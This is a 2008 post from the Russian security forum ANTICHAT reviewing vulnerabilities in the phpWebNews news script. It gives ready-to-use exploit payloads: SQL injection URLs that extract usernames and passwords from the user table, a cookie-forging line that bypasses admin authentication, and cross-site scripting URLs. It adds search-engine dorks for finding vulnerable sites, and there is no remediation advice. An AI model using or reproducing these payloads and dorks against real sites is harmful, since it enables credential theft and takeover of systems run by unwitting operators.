HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу [ Обзор уязвимостей phpWebNews ]
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[ Обзор уязвимостей phpWebNews ]
  #1  
Старый 26.07.2008, 23:28
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


По умолчанию [ Обзор уязвимостей phpWebNews ]
[ Обзор уязвимостей phpWebNews ]

phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability

Воздействие:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «det» сценарием bukutamu.php и в параметре «id_kat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Exploit:

Код:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability

Exploit:

Код:
http://site.com/index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vulnerability

Exploit:

PHP код:
javascript:document.cookie "a1=admin ' or 1=1/*; path=/;"document.cookie "a2=[what ever]; path=/;"
phpwebnews v.1 Multiple Cross Site Scripting Vulnerabilites

Exploit:

Код:
www.example.com/[path]/iklan.php?m_txt=<script>alert(/the_Edit0r/);</script>

www.example.com/[path]/index.php?m_txt=<script>alert(/the_Edit0r/);</script> 

www.example.com/[path]/bukutamu.php?m_txt=<script>alert(/the_Edit0r/);</script>
Dork:

Powered by PHPWebNews
Powered by PHPWebNews v1.0
Powered by PHPWebNews v2.0
allinurl:index.php?id_kat=

Download phpWebNews:

phpwebnews-mysql 0.2
phpwebnews-posgresql 0.1
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось ~!DoK_tOR!~; 27.07.2008 в 02:06..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор уязвимостей [Oracle] ~!DoK_tOR!~ Веб-уязвимости 3 20.07.2008 04:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.